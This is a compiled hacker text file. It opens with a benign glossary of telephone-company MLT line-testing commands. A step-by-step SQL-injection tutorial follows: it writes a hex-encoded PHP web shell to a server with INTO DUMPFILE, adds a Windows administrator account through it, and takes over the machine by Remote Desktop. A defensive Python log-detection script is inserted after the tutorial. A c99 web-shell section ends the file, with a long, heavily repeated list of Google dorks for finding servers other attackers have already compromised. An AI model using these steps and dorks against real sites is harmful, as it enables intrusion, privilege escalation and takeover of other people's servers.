Look is used to identify a fault, usually a short or ground, that has been
placed on the line by the repair person. Look can be used when a repair
person is having trouble locating a particular line. Look gets MLT to monitor
the line that the repair person is looking for. When the repair person shorts
or grounds the line, mlt sends a tone to you over your headset. You can tell
the repair person that you "see the short". A callback path is required for a
look request. You should talk to the repair person on a line other than the
one you are working on.

Lookin: Look for an intentional fault on a special services line

Lookin is used to identify a fault, usually a short or ground, that has been
placed on the special services line by the technician. Lookin is used to
locate a particular line by having MLT monitor the line that the repair person
is looking for. When the repair person shorts or grounds the line, MLT sends
a tone to you over your headset. You can tell the repair person that you "See
the short." A callback path is required for a lookin request. You should talk
to the repair person on a line other than the one you are working on. MDF
access is required.

Loop: Test the outside part of the loop

Loop starts a series of tests that do an extensive analysis of the outside
portion of the line. Loop does every test that full does except the line
circuit and draw and break dial tone tests. Loop can be requested using
either a no-test or an MDF trunk. A no-test access connects you to the entire
line but a loop request tests only the outside portion. An MDF access is only
connected to the outside portion. Use a no-test trunk when you are fairly sure
the trouble is out of the co and an MDF when you are not sure.

Lrm: Get fast loop resistance measurement

Lrm gives you a quick measurement of the DC resistance on a line. Lrm can't
be run unless either the receiver is off-hook or the line is strapped tip to
ring (an intentional short is placed on the line by the repair person). Also,
MLT will not accept an lrm request if there is a hard ground on the line. Lrm
does not access the line so you must already have access to do an lrm. You
can use lrm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from the lrm can be compared to the old
resistance values that are stored inside each coinset.

MDF(#): Access a specific MDF trunk

MDF(#) lets you choose the MDF trunk that you want MLT to access. Use this
request when an MDF trunk is connected to a telephone line at the MDF but is
not connected to the loop testing system. This may occur in small offices
where the frame attendant doesn't work for the entire day. You can also use
this request when an MDF trunk has to be tested and repaired. The MDF entry
must be a five character entry consisting of the wire center identifier and
the trunk number.

Mdf: Access a main distributing frame (MDF)

MDF connects the mlt testing equipment to an MDF trunk. Before you can enter
any requests, you must have the frame attendant connect the MDF trunk to the
subscriber's line. Remember that MLT automatically accesses a no-test trunk
unless you specifically request an MDF trunk. An MDF trunk goes directly from
the loop testing system to the main distributing frame, bypassing the central
office switch. Using an MDF trunk allows you to test loops that are connected
to co equipment that is not MLT-testable. Also, you can sectionalize a fault
in or out of the co by testing "in" or "out" using MDF.

MDF(gr): Access a trunk from a certain mdf trunk group

MDF(gr) lets you choose the MDF trunk group from which MLT will choose an MDF
trunk. Use the MDF(gr) request when the NPA-NXX that you are using has more
than one frame associated with it and you can't enter cable and pair numbers.
For example, to request MDF trunk group a, you should enter MDFA in the req
field. To find out which trunk groups are available for your NPA-NXX you can
either enter an mdf or an info request. Remember that you still have to call
the frame attendant to have the trunk and line connected and also disconnect
when you are finished.

Mdfin: Test the inside part of a line

Mdfin starts a series of tests that do an extensive analysis of the inside
line. This includes line circuit and dial tone tests. The mdfin request uses
a special line that runs from the MLT testing equipment to the MDF. You must
ask the frame attendant to connect this line to the subscriber's line. Then
you must enter the telephone number of this special line on the test mask
along with mdfin and the subscriber's number. For more information see the
mdfio module in the MLT-2 user guide.

Mdfout: Test the outside part of a line

Mdfout starts a series of tests that do an extensive analysis of the outside
line. This includes the DC and AC tests. The mdfout request uses a special
line that runs from the mlt testing equipment to the MDF. You must ask the
frame attendant to connect this line to the subscriber's line. Then you must
enter the telephone number of this special line on the test mask along with
mdfout and the subscriber's number.

Mon: Monitor a subscriber's line

Mon lets you monitor a subscriber's line. Sometimes you are a better judge of
whether there is noise, speech, or a recording on a line than MLT is. If you
want to listen to a line to determine if one of these conditions does exist,
use the mon request. You can also be automatically placed in the monitor mode
by MLT in some cases. You will be put in monitor mode if you request ring,
talk or psr but MLT thinks the line is busy, or if you must talk to the
subscriber to run a rev, dial, or tt. A callback number is required. You can
request quick, look, or full while in monitor mode.

Psr: Release a permanent signal

Psr attempts to release a permanent signal in a step-by-step central office.
A permanent signal is a steady dial tone on a line. A frequent cause is a
receiver that is off-hook. Psr lets you remove the permanent signal so that
you can monitor for room noise. If when you monitor the line you still hear
steady dial tone, you should suspect permanent signal on the line. Psr
requires a callback path between your callback line and the subscriber's line.
You should already have the callback path established before you enter a psr
request.

Qin: Run a quick series in toward the co

Qin starts a series of tests that make a "quick" check of the loop toward the
central office. It includes the same tests as quick. It can also identify a
co line circuit if one is present and will report a line circuit if the DC
resistances look like one is present. An MDF access is required for a qin
request. You can use qin to test special circuits that do not use a co
switching machine. For example, if the circuit has 2 loops connected at the
frame, qin lets you look at the 2nd loop (both full & loop only test toward
one loop).

Rev: Identify touch-tone polarity reversals

Rev helps you identify a touch-tone polarity reversal. On a good line, the
battery is connected to the ring wire and the ground is on the tip wire.
These wires must be connected to specific terminals on the telephone. If they
are reversed, the subscriber will be able to receive calls but will not be
able to dial out. If the line is reversed, you won't be able to hear the
tones before you enter a rev request. Rev only reverses the line temporarily.
A callback path should be established before you make a rev request.

Rin: Ring a subscriber's special services line

Rin lets you ring a telephone on a special services line. A callback is
required. If one doesn't exist, rin sets one up for you. To answer the
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing. When the subscriber answers, you will be placed in talk mode. If
the line is busy, the call in progress will be interrupted. Use rin to
contact the subscriber or a technician at the subscriber's home. MDF access
is required to request rin.

Ring(#): Ring a specific party on a multi-party line

Ring(#) lets you choose the telephone that you want to ring on a multiparty
line. A multiparty line is one on which more than one subscriber is connected
to the same pair of wires. Normally MLT checks the line records of the
telephone number you enter using the ring request, and automatically rings the
correct party. When the line records indicate 2, 4, or 8 party, use the
ring(#) request and specify the party number in place of the "#." If you
request ring1, MLT rings the party connected to the ring side. If you request
ring2, MLT rings the party connected on the tip side.

Ring: Ring a subscriber's line

Ring lets you ring a telephone on a single party line. A callback path is
required but if one doesn't exist, ring sets one up for you. To answer your
callback, answer its ring and press "0" on the touch-tone pad, and listen for
ringing. When the subscriber answers, you will be placed in talk mode. If
the line is busy or cannot be rung, you will be placed in monitor mode to
listen for noise or speech. Use ring to contact the subscriber or a repair
person at the subscriber's home.

Ringer: Check ringer configuration on a line

Ringer counts the number of ringers on each part of the loop (tip-ring,
tip-ground, and ring-ground). The results tell you the number of telephones
found by MLT. If there is a problem, the summary explains the problem. If
you are testing a party line, some of the ringers found may belong to the
other party.

Soak: Identify swinging resistance condition

Soak identifies unstable ground faults (swinging resistance) on a line.
Voltage is applied to the line and a series of DC resistance measurements are
made to see the effect of that voltage. If the resistance values are all low,
the fault is probably stable. If even one value is 20% larger than the
original measurement, the fault may be unstable (swinging). A repair person
who is dispatched may have trouble locating a swinging fault. Use soak when
you find a 10-1000 kohm ground on a quick test (full & loop include the soak
test), or just prior to dispatch to double-check a line's condition.

Ssa: Special services access

The ssa request is used to access non-locally switched customer telephone
lines. Accessing these lines is a special case of a no-test trunk access.
However, if they go through a digital loop carrier such as SLC Series 5, and
there is special equipment available in the co, then you can test them with a
no-test trunk special services access. This means you don't have to call the
frame attendant to connect an MDF trunk. The request can only be run from the
stv mask.

Stv: Special services trouble verification request

The stv request changes you from a tv mask to an stv mask. Stv is used when
you need to test special services circuits (non-locally switched lines) served
by digital loop carrier systems such as SLC Series 5. Switching to the stv
mask will not affect any information you left in the tv mask -- your status
lines will remain the same; however, the middle section of the mask will be
changed. Any request done from a tv mask can also be done from an stv mask,
but not vice versa. The stv request can only be run from a tv mask.

Take: Take control of a long-term access

Take is used when you want to transfer a long-term access from someone else's
terminal to your terminal. To take control of a no-test access, enter the
telephone number that you want to transfer in the tn field. To transfer an
MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF
number in the space to the right of the regular tn field of the tv mask.
Finally, enter take in the req field. If the previous holder had a callback
established, it will not be removed. If necessary, you must remove the
callback using xcb and request a new callback to your telephone.

Talk: Talk over the subscriber's line

Talk lets you talk to either a subscriber or a repair person on a subscriber's
line. Talk does not ring the line so there must be someone waiting to talk to
you on the other end of the line. A callback path is required for the talk
request but if one does not already exist, talk will set one up for you if you
have a callback number entered. If the line is already accessed before the
talk request, MLT enters a "t" and the last 2 digits of the callback number
under the callback heading and updates the time since access. You can request
quick, loop, or full while in talk mode.

Talkin: Talk over the subscriber's special services line

Talkin lets you talk to a subscriber or a repair person on a special services
line. Talkin does not ring the line so there must be someone waiting to talk
to you on the other end of the line. A callback path is required for the
talkin request but if one does not already exist, talkin sets one up for you
if you have a callback number entered. If the line is already accessed before
the talkin request, MLT enters a "t" and the last 2 digits of the callback
number under the callback heading and updates the time since access. You must
have an MDF access to request talkin.

Tone+: Use loud tone to help identify a pair

Tone+ puts a high amplitude tone on a line. It is used on pairs that are very
long. The extra amplitude helps the repair-person hear the tone over long
distances. Tone is used to help a repair person to locate the correct pair in
a cable with many pairs of wires in it. Use tone+ when a repair person
requests a tone on a very long pair. If you have a callback on the line, it
will be placed in monitor mode. If the status line gets brighter & you get a
changed state message, it means 1) The repair person found the pr & wants to
talk to you or 2) The subscriber has gone off-hook.

Tone: Use tone to help craft identify a pair

Tone puts a metallic tone on a line. There may be many pairs in a single
cable, making it difficult for a repair person to locate a specific line. The
tone makes this job easier. Before MLT places a tone on a line it does a
test. The results tell you if there is a fault on the line. If there is a
callback on the line when you request a tone, it will be placed in monitor
mode. If the status line gets brighter and you get a changed state message,
it means either 1) The repair person found the pr & wants to talk to you or 2)
The subscriber has gone off-hook.

Toneca: Use tone to help identify a cable

Toneca puts a longitudinal tone on a line. This tone helps the repair person
find the cable binder group that the pair is in. The repair person finds the
correct cable by listening for the tone. Because the tone can be heard on
pairs other than the one you put it on, use toneca when tone or tone+ are
inappropriate. If the repair person does not have time to find the cable on
the first try, you can repeat the request. Before placing the tone on the
line, MLT does a pretest and tells you if there is a fault on the line.

Tonein: Use tone to help a technician identify a special services pair

Tonein puts a metallic tone on a special services line. It may be difficult
for a technician to locate a specific line. The tone makes this job easier.
Before MLT places a tone on a line it does a pretest. An MDF access is
required in order to request a tonein. If a callback is on the line when you
request tonein, it is placed in monitor mode. If the status line gets
brighter and you get a changed state message, it means either 1) The repair
person found the pr & wants to talk to you or, 2) The subscriber has gone
off-hook.

Tt: Test the subscriber's touch-tone pad

Tt checks a subscriber's touch-tone pad. It analyzes the tones produced when
the subscriber presses the buttons in the sequence 1 through 0. You must
instruct the subscriber to press the buttons after hearing dial tone. MLT
will signal you over your headset with two beeps if the pad is good, or one
or no beeps if it is bad. A callback path should be established before you
make a tt request. You must use a no-test trunk access to request it. You
can use the ring request to contact the subscriber and set up a callback.

Tv: Trouble verification request

The tv request changes you from an stv mask to a tv mask. Tv is used when you
need to do interactive testing of locally switched telephone lines, or tests
using an MDF trunk. Switching to the tv mask will not affect any information
you left in the stv mask -- your status lines will remain the same; however,
the middle section of the mask will be changed. Any request done from a tv
mask can also be done from an stv mask, but not vice versa. The request can
only be run from a stv mask.

Ver##: Get definition and example of a ver code

Ver## gives you a description of the ver code that you type in place of the
##. For example, a ver22 request will give you a definition of verification
code number 22 and an example of a typical set of test results that might
accompany a ver code of 22. Use this request whenever you can't remember what
a certain ver code means. MLT stores your tv mask when you request ver code
information.

Ver: Test the entire telephone line

Ver starts a series of tests that do an extensive analysis of the entire line.
This includes both the inside and outside portions. Many individual tests are
run but only the ver code and summary messages are displayed. Outside, MLT
checks for AC and DC faults. Inside, it checks the line circuit and dial
tone.

Thanks to AT&T and the Bell Operating Companies.

Control C and The Tribunal of Knowledge

If you have any questions or comments contact:

Control C
Jack Death
Prime Suspect
The Prophet
The Urvile

Or any other member of the TOK.
==============================================================================

SQL Remote Desktop

Well, some of you may already know about this (SQL Remote Desktop), so sorry if
I sound like a know-it-all; masters and tutors, please don't laugh at me, I'm
just a script kiddie here. Straight to the point: the idea behind getting a
remote desktop through SQL is the same as any other SQL injection, we just
change the SQL syntax a little.

===========
FIRST
===========
For the first step, we obviously need a target site that is vulnerable to SQL
injection. Searching and dorks I leave to you; you can always ask Professor
Google, heh, since my "campus" is sometimes the internet cafe :p

===========
SECOND
===========
Once we have a site vulnerable to SQL injection, find the site's IP address
(this makes the remote desktop step easier, because the RDP client will ask
for the IP address).

===========
THIRD
===========
Now that we have the site's IP address, find the injectable column (SQL
injection method); say we get column 1

code:
192.168.0.1/index.php?=-1+union+select+1--

then find the version

code:
192.168.0.1/index.php?=-1+union+select+version()--

So far I have only done this on MySQL 5.x

===========
FOURTH
===========
replace the injectable column with

code:
192.168.0.1/index.php?=-1+union+select+load_file('c:/boot.ini')--

load_file('c:/boot.ini') reads the boot configuration file from the victim's
machine. If the file contents come back, two things are confirmed: the
database account has the FILE privilege (which INTO DUMPFILE in the next
steps also needs), and the server is running Windows.

===========
FIFTH
===========
after that we convert the PHP one-liner

code:
<?php system($_GET['cmd']); ?>

into a MySQL hex literal, so it can be injected without any quote characters.
I know you're too lazy to convert it yourselves, so here is the result

code:
0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e

===========
SIXTH
===========
ok, now let's create the file cmd.php using SQL syntax

code:
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e+into+dumpfile+'c:/xampp/htdocs/cmd.php'--


0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e >> the hex form of <?php system($_GET['cmd']); ?>

+into+dumpfile+ >> writes the selected value to a file on the server; this needs the FILE privilege, a web root that the MySQL service account can write to, and no secure_file_priv setting that excludes that directory

c:/xampp/htdocs/cmd.php >> taken from the SQL error message (with the backslashes changed to forward slashes); if the target uses AppServ instead, it is C:/AppServ/www/cmd.php
===========
SEVENTH
===========
change the URL to

code:
192.168.0.1/cmd.php?cmd=dir

and you get a directory listing from the victim's machine (the current
directory of the web server process, not necessarily the root of c:/)

===========
EIGHTH
===========
this is the part I don't fully understand, because I don't know where it comes
from, but I do understand what the code is for

type into the URL

code:
192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add

net user kiddies 12345 /add >> creates a new account on the system, username kiddies with password 12345


code:
192.168.0.1/cmd.php?cmd=net localgroup Administrators kiddies /add

net localgroup Administrators kiddies /add >> adds our account to the local Administrators group (the built-in group is named Administrators; both net commands only succeed if the web server, and therefore cmd.php, already runs with administrative rights, for example as a Windows service under LocalSystem)

==========
NINTH
==========
in Run, type >> mstsc

then enter the target's IP address in the Remote Desktop client and log in
with the account created in the previous step.

==========
TENTH
==========
the computer is now in your hands; please use it well and wisely....

if the tutorial is lame I really apologize, and if the PoC is incomplete I
apologize too, because I'm still learning myself

requirement: Remote Desktop must be enabled on the target computer, ok
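Seen from the defender's side, the chain above leaves a distinctive trail in the web server's access log: a UNION SELECT probe, a load_file() read, an INTO DUMPFILE write carrying a 0x hex literal, and then requests to the file that was just dropped. The Python script below is an added example, not part of the original tutorial: it URL-decodes each request's query string, tags those stages, decodes the hex literal to show what was written, and marks later hits on the dropped file as web-shell use. The log lines are constructed for the example (Apache combined format, trimmed to the fields used), and the mapping from the dumpfile path to a URL by basename assumes the file was written directly under the web root.

```python
"""Detect the SQLi -> INTO DUMPFILE -> cmd.php chain in Apache-style access logs.

Example code added to this page; the log lines below are constructed, not captured.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log (Apache combined format, trimmed to the fields used).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2009:10:00:01 +0000] "GET /index.php?id=-1+union+select+1-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2009:10:00:02 +0000] "GET /index.php?id=-1+union+select+version()-- HTTP/1.1" 200 530
10.0.0.5 - - [01/Jan/2009:10:00:03 +0000] "GET /index.php?id=-1+union+select+load_file('c:/boot.ini')-- HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2009:10:00:04 +0000] "GET /index.php?id=-1+union+select+0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e+into+dumpfile+'c:/xampp/htdocs/cmd.php'-- HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2009:10:00:05 +0000] "GET /cmd.php?cmd=dir HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2009:10:00:06 +0000] "GET /cmd.php?cmd=net+user+kiddies+12345+/add HTTP/1.1" 200 40
192.0.2.7 - - [01/Jan/2009:10:00:07 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
HEX_LITERAL_RE = re.compile(r'0x([0-9a-fA-F]{2,})')
FILE_TARGET_RE = re.compile(r"into\s+(?:dumpfile|outfile)\s+'([^']+)'", re.I)

# Stages of the chain, matched against the URL-decoded query string.
STAGES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(?:dumpfile|outfile)\b", re.I),
}


def decode_hex_literals(query):
    """Decode MySQL 0x... literals; the attack uses them to smuggle PHP past quoting."""
    out = []
    for m in HEX_LITERAL_RE.finditer(query):
        digits = m.group(1)
        if len(digits) % 2 == 0:
            out.append(bytes.fromhex(digits).decode("latin-1"))
    return out


def dropped_url_path(os_path):
    """Map 'c:/xampp/htdocs/cmd.php' to '/cmd.php' (assumes the file sits in the web root)."""
    return "/" + os_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(log_text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    dropped = set()  # URL paths of files written via INTO DUMPFILE/OUTFILE
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        path, query = parts.path, unquote_plus(parts.query)
        tags = [name for name, rx in STAGES.items() if rx.search(query)]
        payload = []
        if "file_write" in tags:
            payload = decode_hex_literals(query)
            fm = FILE_TARGET_RE.search(query)
            if fm:
                dropped.add(dropped_url_path(fm.group(1)))
        if path.lower() in dropped:
            tags.append("webshell_hit")
        if tags:
            findings.append({"ip": m["ip"], "path": path, "query": query,
                             "tags": tags, "payload": payload})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ip"], f["path"], ",".join(f["tags"]), f["payload"] or "")
```

Run against a real log, the "webshell_hit" tag is the one worth alerting on: the earlier stages also fire on scanners that never succeed, but a request to a path that an INTO DUMPFILE wrote means the write worked.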

Finding c99 shells

Most of you probably already know c99; it is a kind of PHP shell, so it gives you shell access through the browser.
How do you get c99? Just search Google for the source. And how do you use it? Through RFI, for example http://target.com/path/index.php?page=[c99 shell]
That's how. But sometimes, after a penetration like that, attackers leave the c99 file on the victim's hosting, under all sorts of odd names.

So, how do you find sites with RFI? Me, I usually ask om SkiN, hahaha (just ask om SkiN!!). And if om SkiN won't give you any (maybe he is being stingy), we just use Google to find hosting that attackers have already planted shells on, hohoho, Grandpa Google once again.

Here are the Google dorks:
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:"/c99.php"
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php
inurl:"c99.php"
allinurl:c99.php
inurl:"/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:"c99.php"
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
allinurl:c99.php?
allinurl:c99.php?
allinurl:c99.php?
"inurl:c99..php"
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
c99.php download
inurl:c99.php
inurl:"c99.php"
inurl:/c99.php
inurl:"c99.php?"
inurl:c99.php
inurl:c99.php
files/c99.php
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php
inurl:c99.php
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
inurl:c99.php
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove

Logout
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
inurl:c99.php
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:"c99.php"
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release
inurl:"c99.php"
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
c99shell v. 1.0 pre-release build #16 |
allinurl:/c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php ext:php
allinurl:"c99.php"
C99Shell v. 1.0 pre-release build #16 software apache
allintitle: C99shell filetype:php
"c99shell v. 1.0 pre-release"
c99shell v. 1.0 pre-release build #5
allinurl:"c99.php" filetype:php
!C99Shell v. 1.0 pre-release build #16!
intitle:C99Shell v. 1.0 pre-release +uname
c99shell v. 1.0
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
inurl:"/c99.php"
c99shell +uname
c99shell php + uname
C99Shell v.1.0 pre-release
"Encoder Tools Proc. FTP brute"
"c99" filetype:php intext:"Safe-Mode: OFF"
c99shell v. 1.0 pre
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
img/c99.php
img.c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php